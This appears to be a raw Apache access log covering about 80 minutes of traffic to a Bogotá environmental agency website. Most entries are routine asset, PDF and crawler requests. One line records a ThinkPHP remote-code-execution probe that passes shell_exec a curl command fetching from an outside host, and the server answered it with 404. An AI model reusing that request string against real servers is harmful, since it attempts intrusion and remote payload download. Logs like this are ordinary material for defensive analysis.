186.144.76.97 - - [17/Feb/2021:00:55:25 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
186.144.76.97 - - [17/Feb/2021:00:55:25 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
201.218.122.140 - - [17/Feb/2021:00:55:56 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
201.218.122.140 - - [17/Feb/2021:00:55:56 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
201.218.122.140 - - [17/Feb/2021:00:55:56 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
66.249.73.106 - - [17/Feb/2021:00:55:57 -0500] "-" 408 -
69.162.124.227 - - [17/Feb/2021:00:56:07 -0500] "HEAD / HTTP/1.1" 200 -
201.218.122.140 - - [17/Feb/2021:00:56:19 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
201.218.122.140 - - [17/Feb/2021:00:56:19 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
201.218.122.140 - - [17/Feb/2021:00:56:19 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
194.116.237.98 - - [17/Feb/2021:00:56:40 -0500] "GET / HTTP/1.1" 200 9990
194.116.237.98 - - [17/Feb/2021:00:56:42 -0500] "GET /wp-includes/js/jquery/jquery.js HTTP/1.1" 404 1015
201.218.122.140 - - [17/Feb/2021:00:58:45 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
201.218.122.140 - - [17/Feb/2021:00:58:45 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
201.218.122.140 - - [17/Feb/2021:00:58:45 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
190.24.30.157 - - [17/Feb/2021:00:58:55 -0500] "GET /silvicultura/1.pdf HTTP/1.1" 200 334952
190.24.30.157 - - [17/Feb/2021:00:58:56 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
201.218.122.140 - - [17/Feb/2021:00:59:07 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
201.218.122.140 - - [17/Feb/2021:00:59:07 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
201.218.122.140 - - [17/Feb/2021:00:59:07 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
66.249.73.12 - - [17/Feb/2021:00:59:19 -0500] "-" 408 -
186.84.21.72 - - [17/Feb/2021:00:59:38 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
186.84.21.72 - - [17/Feb/2021:00:59:38 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
186.84.21.72 - - [17/Feb/2021:00:59:38 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
114.119.159.6 - - [17/Feb/2021:00:59:58 -0500] "GET /BLA/resoluciones/AUTOS%202013/1626.pdf HTTP/1.1" 200 1399740
191.156.33.72 - - [17/Feb/2021:01:00:17 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
191.156.41.187 - - [17/Feb/2021:01:00:18 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
191.156.32.120 - - [17/Feb/2021:01:00:18 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
69.162.124.227 - - [17/Feb/2021:01:01:07 -0500] "HEAD / HTTP/1.1" 200 -
40.77.167.69 - - [17/Feb/2021:01:02:37 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
157.55.39.166 - - [17/Feb/2021:01:02:45 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
13.66.139.32 - - [17/Feb/2021:01:03:58 -0500] "GET /galeria/galeria/fotos/1humedal-Burro1G.jpg HTTP/1.1" 200 132804
114.119.146.206 - - [17/Feb/2021:01:05:13 -0500] "GET /BLA/resoluciones/AUTOS%202012/2097.pdf HTTP/1.1" 200 974199
191.102.197.204 - - [17/Feb/2021:01:05:56 -0500] "GET /reportes_sipse/sdg/ServletReporte?reporte=experienia_idoneidad&solicitud=12832&pfdrid_c=false HTTP/1.1" 200 136396
69.162.124.227 - - [17/Feb/2021:01:06:07 -0500] "HEAD / HTTP/1.1" 200 -
191.102.197.204 - - [17/Feb/2021:01:06:25 -0500] "GET /reportes_sipse/sdg/ServletReporte?reporte=experienia_idoneidad&solicitud=12832&pfdrid_c=false HTTP/1.1" 200 136396
186.169.183.176 - - [17/Feb/2021:01:06:33 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
186.169.183.176 - - [17/Feb/2021:01:06:33 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
186.169.183.176 - - [17/Feb/2021:01:06:33 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
191.102.197.204 - - [17/Feb/2021:01:06:41 -0500] "GET /reportes_sipse/sdg/ServletReporte?reporte=experienia_idoneidad&solicitud=12832&pfdrid_c=false HTTP/1.1" 200 136396
191.102.197.204 - - [17/Feb/2021:01:07:00 -0500] "GET /reportes_sipse/sdg/ServletReporte?reporte=experienia_idoneidad&solicitud=12832&pfdrid_c=false HTTP/1.1" 200 136396
191.97.15.211 - - [17/Feb/2021:01:08:16 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
191.97.15.211 - - [17/Feb/2021:01:08:17 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
191.97.15.211 - - [17/Feb/2021:01:08:17 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
191.102.197.204 - - [17/Feb/2021:01:09:01 -0500] "GET /reportes_sipse/sdg/ServletReporte?reporte=experienia_idoneidad&solicitud=12832&pfdrid_c=false HTTP/1.1" 200 136396
189.203.69.110 - - [17/Feb/2021:01:09:28 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
189.203.69.110 - - [17/Feb/2021:01:09:28 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
189.203.69.110 - - [17/Feb/2021:01:09:28 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
201.245.192.253 - - [17/Feb/2021:01:09:01 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 47053
201.245.192.253 - - [17/Feb/2021:01:08:59 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 46898
201.245.192.253 - - [17/Feb/2021:01:09:46 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 46898
69.162.124.227 - - [17/Feb/2021:01:11:07 -0500] "HEAD / HTTP/1.1" 200 -
66.249.73.12 - - [17/Feb/2021:01:12:13 -0500] "-" 408 -
190.42.109.215 - - [17/Feb/2021:01:12:40 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
190.42.109.215 - - [17/Feb/2021:01:12:40 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
190.42.109.215 - - [17/Feb/2021:01:12:40 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
201.245.192.253 - - [17/Feb/2021:01:12:35 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 120771
187.244.87.164 - - [17/Feb/2021:01:13:32 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
187.244.87.164 - - [17/Feb/2021:01:13:32 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
187.244.87.164 - - [17/Feb/2021:01:13:32 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
66.102.7.12 - - [17/Feb/2021:01:13:32 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
66.102.7.14 - - [17/Feb/2021:01:13:32 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
66.102.7.12 - - [17/Feb/2021:01:13:32 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
51.158.161.141 - - [17/Feb/2021:01:14:28 -0500] "GET / HTTP/1.1" 200 9990
51.158.161.141 - - [17/Feb/2021:01:14:29 -0500] "GET /ads.txt HTTP/1.1" 404 1015
114.119.146.206 - - [17/Feb/2021:01:15:30 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/2431.pdf HTTP/1.1" 200 504353
190.28.214.226 - - [17/Feb/2021:01:15:30 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
190.28.214.226 - - [17/Feb/2021:01:15:30 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
190.28.214.226 - - [17/Feb/2021:01:15:30 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
69.162.124.227 - - [17/Feb/2021:01:16:07 -0500] "HEAD / HTTP/1.1" 200 -
186.113.10.19 - - [17/Feb/2021:01:19:03 -0500] "GET /galeria/nivo-slider/demo/images/bannerclimabog.jpg HTTP/1.1" 304 -
190.145.206.59 - - [17/Feb/2021:01:19:07 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
190.145.206.59 - - [17/Feb/2021:01:19:07 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
190.145.206.59 - - [17/Feb/2021:01:19:07 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
190.145.206.59 - - [17/Feb/2021:01:19:11 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
190.145.206.59 - - [17/Feb/2021:01:19:11 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
190.145.206.59 - - [17/Feb/2021:01:19:11 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
201.245.192.253 - - [17/Feb/2021:01:19:00 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 47053
114.119.147.246 - - [17/Feb/2021:01:19:55 -0500] "-" 408 -
190.108.76.173 - - [17/Feb/2021:01:20:07 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
190.108.76.173 - - [17/Feb/2021:01:20:07 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
201.245.192.253 - - [17/Feb/2021:01:19:47 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 46898
114.119.142.12 - - [17/Feb/2021:01:20:46 -0500] "GET /BLA/resoluciones/AUTOS%202013/0223.pdf HTTP/1.1" 200 1524770
66.249.73.109 - - [17/Feb/2021:01:21:04 -0500] "-" 408 -
201.182.251.200 - - [17/Feb/2021:01:21:07 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
201.182.251.200 - - [17/Feb/2021:01:21:07 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
201.182.251.200 - - [17/Feb/2021:01:21:07 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
69.162.124.227 - - [17/Feb/2021:01:21:07 -0500] "HEAD / HTTP/1.1" 200 -
103.253.154.188 - - [17/Feb/2021:01:22:10 -0500] "GET / HTTP/1.1" 200 9990
201.245.192.253 - - [17/Feb/2021:01:22:35 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 120771
40.77.167.26 - - [17/Feb/2021:01:23:44 -0500] "-" 408 -
40.77.167.26 - - [17/Feb/2021:01:24:13 -0500] "-" 408 -
13.66.139.27 - - [17/Feb/2021:01:24:36 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202000/2000%20600-649.tif HTTP/1.1" 200 6324287
114.119.145.140 - - [17/Feb/2021:01:25:49 -0500] "GET /Anexos%20estudio%20Organizacional%20SDA/index.php?dir=ANEXO%20No.%208%20-%20MATRICES%20DE%20REGISTRO%20Y%20DE%20SALIDA%20MEDICI%C3%83%C2%83%C3%82%C2%AF%C3%83%C2%82%C3%82%C2%BF%C3%83%C2%82%C3%82%C2%BDN%20CARGAS%20LABORALES%20SDA%2F3.%20Direccion%20de%20Planeacion%2F&sort=size&order=desc HTTP/1.1" 200 6540
114.119.159.6 - - [17/Feb/2021:01:26:02 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202014/0964.pdf HTTP/1.1" 200 506134
69.162.124.227 - - [17/Feb/2021:01:26:07 -0500] "HEAD / HTTP/1.1" 200 -
190.84.198.67 - - [17/Feb/2021:01:26:21 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
190.84.198.67 - - [17/Feb/2021:01:26:21 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
190.84.198.67 - - [17/Feb/2021:01:26:21 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
190.84.198.67 - - [17/Feb/2021:01:26:23 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
190.84.198.67 - - [17/Feb/2021:01:26:23 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
190.84.198.67 - - [17/Feb/2021:01:26:24 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
201.245.192.253 - - [17/Feb/2021:01:29:00 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 47053
190.146.114.183 - - [17/Feb/2021:01:30:22 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
190.146.114.183 - - [17/Feb/2021:01:30:22 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
190.146.114.183 - - [17/Feb/2021:01:30:22 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
201.245.192.253 - - [17/Feb/2021:01:29:47 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 46898
69.162.124.227 - - [17/Feb/2021:01:31:07 -0500] "HEAD / HTTP/1.1" 200 -
114.119.142.12 - - [17/Feb/2021:01:31:18 -0500] "GET /BLA/resoluciones/AUTOS%202014/7072.pdf HTTP/1.1" 200 803376
66.249.73.16 - - [17/Feb/2021:01:33:11 -0500] "-" 408 -
201.245.192.253 - - [17/Feb/2021:01:32:36 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 120771
207.46.13.8 - - [17/Feb/2021:01:33:47 -0500] "GET /ecodirectorio/files/res/downloads/download_0159.pdf HTTP/1.1" 404 1015
191.102.197.204 - - [17/Feb/2021:01:34:54 -0500] "GET /reportes_sipse/sdg/ServletReporte?reporte=experienia_idoneidad&solicitud=12832&pfdrid_c=false HTTP/1.1" 200 136396
191.102.197.204 - - [17/Feb/2021:01:35:01 -0500] "GET /reportes_sipse/sdg/ServletReporte?reporte=experienia_idoneidad&solicitud=12832&pfdrid_c=false HTTP/1.1" 200 136396
69.162.124.227 - - [17/Feb/2021:01:36:07 -0500] "HEAD / HTTP/1.1" 200 -
186.154.133.48 - - [17/Feb/2021:01:36:08 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
186.154.133.48 - - [17/Feb/2021:01:36:10 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
186.154.133.48 - - [17/Feb/2021:01:36:10 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
191.102.197.204 - - [17/Feb/2021:01:36:18 -0500] "GET /reportes_sipse/sdg/ServletReporte?reporte=experienia_idoneidad&solicitud=12832&pfdrid_c=false HTTP/1.1" 200 136396
114.119.159.6 - - [17/Feb/2021:01:36:33 -0500] "GET /BLA/resoluciones/AUTOS%202018/3612.pdf HTTP/1.1" 200 325549
40.88.21.235 - - [17/Feb/2021:01:38:56 -0500] "GET / HTTP/1.1" 200 9990
40.88.21.235 - - [17/Feb/2021:01:38:56 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
5.90.169.196 - - [17/Feb/2021:01:39:10 -0500] "GET / HTTP/1.1" 200 9990
5.90.169.196 - - [17/Feb/2021:01:39:10 -0500] "GET /css/style.css HTTP/1.1" 200 3610
5.90.169.196 - - [17/Feb/2021:01:39:10 -0500] "GET /css/bootstrap.min.css HTTP/1.1" 200 105939
5.90.169.196 - - [17/Feb/2021:01:39:11 -0500] "GET /js/jquery.js HTTP/1.1" 200 97120
5.90.169.196 - - [17/Feb/2021:01:39:11 -0500] "GET /js/bootstrap.min.js HTTP/1.1" 200 28538
5.90.169.196 - - [17/Feb/2021:01:39:11 -0500] "GET /images/LINEA.jpg HTTP/1.1" 200 33035
5.90.169.196 - - [17/Feb/2021:01:39:11 -0500] "GET /images/RMCAB.jpg HTTP/1.1" 200 49926
5.90.169.196 - - [17/Feb/2021:01:39:11 -0500] "GET /images/INTERNET.jpg HTTP/1.1" 200 34880
5.90.169.196 - - [17/Feb/2021:01:39:12 -0500] "GET /images/NINOS.jpg HTTP/1.1" 200 44828
5.90.169.196 - - [17/Feb/2021:01:39:12 -0500] "GET /images/INTRANET.jpg HTTP/1.1" 200 37297
5.90.169.196 - - [17/Feb/2021:01:39:12 -0500] "GET /images/FOREST.jpg HTTP/1.1" 200 33277
5.90.169.196 - - [17/Feb/2021:01:39:12 -0500] "GET /images/SDA.jpg HTTP/1.1" 200 48976
5.90.169.196 - - [17/Feb/2021:01:39:12 -0500] "GET /images/FORMATOS.jpg HTTP/1.1" 200 41585
5.90.169.196 - - [17/Feb/2021:01:39:12 -0500] "GET /images/CORREO.jpg HTTP/1.1" 200 39337
5.90.169.196 - - [17/Feb/2021:01:39:12 -0500] "GET /images/SDQS.jpg HTTP/1.1" 200 47976
5.90.169.196 - - [17/Feb/2021:01:39:12 -0500] "GET /images/BLA.jpg HTTP/1.1" 200 34672
5.90.169.196 - - [17/Feb/2021:01:39:12 -0500] "GET /images/CATALOGO.jpg HTTP/1.1" 200 35661
5.90.169.196 - - [17/Feb/2021:01:39:13 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
5.90.169.196 - - [17/Feb/2021:01:39:25 -0500] "GET /www.ambientebogota.gov.co/ HTTP/1.1" 404 1204
186.115.231.53 - - [17/Feb/2021:01:40:22 -0500] "-" 408 -
13.66.139.32 - - [17/Feb/2021:01:40:30 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202000/2000%201300-1349.tif HTTP/1.1" 200 5095471
69.162.124.227 - - [17/Feb/2021:01:41:07 -0500] "HEAD / HTTP/1.1" 200 -
114.119.153.118 - - [17/Feb/2021:01:41:48 -0500] "GET /BLA/resoluciones/AUTOS%202019/1940.pdf HTTP/1.1" 200 287040
66.249.73.12 - - [17/Feb/2021:01:42:33 -0500] "-" 408 -
5.90.169.196 - - [17/Feb/2021:01:42:52 -0500] "GET /www.ambientebogota.gov.co/web/intranet/inicio?p_p_state=maximized&p_p_mode=view&saveLastPath=0&_58_struts_action=%2Flogin%2Flogin&p_p_id=58&p_p_lifecycle=0&_58_redirect=%2Fgroup%2Fintranet%2Finicio HTTP/1.1" 404 1204
5.90.169.196 - - [17/Feb/2021:01:43:00 -0500] "GET /www.ambientebogota.gov.co/ HTTP/1.1" 404 1204
201.245.192.253 - - [17/Feb/2021:01:42:34 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 120771
191.102.197.204 - - [17/Feb/2021:01:43:47 -0500] "GET /reportes_sipse/sdg/ServletReporte?reporte=experienia_idoneidad&solicitud=12832&pfdrid_c=false HTTP/1.1" 200 136396
69.162.124.227 - - [17/Feb/2021:01:46:07 -0500] "HEAD / HTTP/1.1" 200 -
114.119.136.138 - - [17/Feb/2021:01:47:04 -0500] "GET /BLA/resoluciones/AUTOS%202016/0618.pdf HTTP/1.1" 200 702084
104.248.176.65 - - [17/Feb/2021:01:47:10 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
104.248.176.65 - - [17/Feb/2021:01:47:10 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
104.248.176.65 - - [17/Feb/2021:01:47:11 -0500] "GET /galeria/carrusel/Carrusel/jquery-ui-1.8.13.custom.min.js HTTP/1.1" 200 10800
104.248.176.65 - - [17/Feb/2021:01:47:11 -0500] "GET /galeria/carrusel/Carrusel/jquery.thumbnailScroller.js HTTP/1.1" 200 8157
186.84.77.155 - - [17/Feb/2021:01:47:33 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
186.84.77.155 - - [17/Feb/2021:01:47:33 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
186.84.77.155 - - [17/Feb/2021:01:47:33 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
69.162.124.227 - - [17/Feb/2021:01:51:07 -0500] "HEAD / HTTP/1.1" 200 -
66.249.73.12 - - [17/Feb/2021:01:51:19 -0500] "-" 408 -
186.84.22.233 - - [17/Feb/2021:01:52:03 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
186.84.22.233 - - [17/Feb/2021:01:52:03 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
186.84.22.233 - - [17/Feb/2021:01:52:03 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
114.119.157.166 - - [17/Feb/2021:01:52:19 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202015/03759.doc HTTP/1.1" 200 145029
40.77.167.26 - - [17/Feb/2021:01:52:55 -0500] "-" 408 -
40.77.167.26 - - [17/Feb/2021:01:53:16 -0500] "-" 408 -
80.29.118.196 - - [17/Feb/2021:01:54:08 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
80.29.118.196 - - [17/Feb/2021:01:54:08 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
80.29.118.196 - - [17/Feb/2021:01:54:08 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
190.25.108.84 - - [17/Feb/2021:01:54:45 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
190.25.108.84 - - [17/Feb/2021:01:54:45 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
190.25.108.84 - - [17/Feb/2021:01:54:45 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
190.25.108.84 - - [17/Feb/2021:01:54:45 -0500] "GET /galeria/carrusel/Carrusel/jquery.thumbnailScroller.css HTTP/1.1" 200 2066
190.25.108.84 - - [17/Feb/2021:01:54:45 -0500] "GET /galeria/carrusel/Carrusel/jquery-ui-1.8.13.custom.min.js HTTP/1.1" 200 10800
190.25.108.84 - - [17/Feb/2021:01:54:45 -0500] "GET /galeria/carrusel/Carrusel/jquery.thumbnailScroller.js HTTP/1.1" 200 8157
40.77.190.115 - - [17/Feb/2021:01:55:37 -0500] "GET /galeria/carrusel/Carrusel/jquery.thumbnailScroller.css HTTP/1.1" 200 2066
40.77.190.115 - - [17/Feb/2021:01:55:37 -0500] "GET /galeria/carrusel/Carrusel/jquery-ui-1.8.13.custom.min.js HTTP/1.1" 200 10800
40.77.190.115 - - [17/Feb/2021:01:55:38 -0500] "GET /galeria/carrusel/Carrusel/jquery.thumbnailScroller.js HTTP/1.1" 200 8157
40.77.190.115 - - [17/Feb/2021:01:55:38 -0500] "GET /galeria/nivo-slider/demo/inicio80.html HTTP/1.1" 200 4568
40.77.190.115 - - [17/Feb/2021:01:55:39 -0500] "GET /galeria/nivo-slider/themes/pascal/pascal.css HTTP/1.1" 200 2258
40.77.190.115 - - [17/Feb/2021:01:55:39 -0500] "GET /galeria/nivo-slider/themes/orman/orman.css HTTP/1.1" 200 2152
40.77.190.115 - - [17/Feb/2021:01:55:39 -0500] "GET /galeria/nivo-slider/demo/style.css HTTP/1.1" 200 2222
40.77.190.115 - - [17/Feb/2021:01:55:39 -0500] "GET /galeria/nivo-slider/jquery.nivo.slider.pack.js HTTP/1.1" 200 11561
40.77.190.115 - - [17/Feb/2021:01:55:39 -0500] "GET /galeria/nivo-slider/nivo-slider.css HTTP/1.1" 200 1507
40.77.190.115 - - [17/Feb/2021:01:55:39 -0500] "GET /galeria/nivo-slider/demo/scripts/jquery-1.7.1.min.js HTTP/1.1" 200 93868
40.77.190.115 - - [17/Feb/2021:01:55:39 -0500] "GET /galeria/nivo-slider/themes/default/default.css HTTP/1.1" 200 1569
69.162.124.227 - - [17/Feb/2021:01:56:07 -0500] "HEAD / HTTP/1.1" 200 -
114.119.135.169 - - [17/Feb/2021:01:57:35 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202014/1359.pdf HTTP/1.1" 200 818911
186.87.242.224 - - [17/Feb/2021:01:57:56 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
186.87.242.224 - - [17/Feb/2021:01:57:56 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
186.87.242.224 - - [17/Feb/2021:01:57:56 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
66.249.73.12 - - [17/Feb/2021:02:00:16 -0500] "-" 408 -
13.66.139.84 - - [17/Feb/2021:02:00:46 -0500] "GET / HTTP/1.1" 200 9990
69.162.124.227 - - [17/Feb/2021:02:01:07 -0500] "HEAD / HTTP/1.1" 200 -
23.90.29.116 - - [17/Feb/2021:02:01:41 -0500] "GET / HTTP/1.0" 200 9990
23.90.29.116 - - [17/Feb/2021:02:01:44 -0500] "GET /www.ambientebogota.gov.co:81/ HTTP/1.0" 403 1017
107.175.224.133 - - [17/Feb/2021:02:01:45 -0500] "GET /www.ambientebogota.gov.co:81/ HTTP/1.0" 403 1017
107.175.89.124 - - [17/Feb/2021:02:01:45 -0500] "GET /www.ambientebogota.gov.co:81/ HTTP/1.0" 403 1017
172.245.229.85 - - [17/Feb/2021:02:01:46 -0500] "GET /www.ambientebogota.gov.co:81/ HTTP/1.0" 403 1017
192.227.182.151 - - [17/Feb/2021:02:01:46 -0500] "GET / HTTP/1.0" 200 9990
114.119.142.12 - - [17/Feb/2021:02:02:51 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202018/1780.pdf HTTP/1.1" 200 3809123
201.245.192.253 - - [17/Feb/2021:02:02:35 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 213
192.227.182.151 - - [17/Feb/2021:02:01:47 -0500] "GET /BLA/boletinlegal/ HTTP/1.0" 200 66412
192.227.182.151 - - [17/Feb/2021:02:03:38 -0500] "GET /catalogoisis/ HTTP/1.0" 200 8575
5.180.211.73 - - [17/Feb/2021:02:04:08 -0500] "GET /public/index.php?s=/Index/%09hink%07pp/invokefunction&function=call_user_func_array&vars%5B0%5D=shell_exec&vars%5B1%5D%5B%5D=curl%205.180.211.73/thinkphp HTTP/1.1" 404 1018
181.63.60.62 - - [17/Feb/2021:02:06:06 -0500] "-" 408 -
69.162.124.227 - - [17/Feb/2021:02:06:07 -0500] "HEAD / HTTP/1.1" 200 -
114.119.153.118 - - [17/Feb/2021:02:08:06 -0500] "GET /BLA/resoluciones/AUTOS%202012/0478.pdf HTTP/1.1" 200 513192
13.66.139.27 - - [17/Feb/2021:02:09:00 -0500] "GET /galeria/galeria/fotos/Humedal-techo3G.jpg HTTP/1.1" 200 378344
201.245.192.253 - - [17/Feb/2021:02:09:00 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 47200
201.245.192.253 - - [17/Feb/2021:02:09:00 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 47210
186.115.231.53 - - [17/Feb/2021:02:10:26 -0500] "-" 408 -
201.245.192.253 - - [17/Feb/2021:02:09:44 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 47210
114.119.137.173 - - [17/Feb/2021:02:10:48 -0500] "-" 408 -
69.162.124.227 - - [17/Feb/2021:02:11:07 -0500] "HEAD / HTTP/1.1" 200 -
40.77.167.30 - - [17/Feb/2021:02:12:21 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202011/6971.pdf HTTP/1.1" 304 -
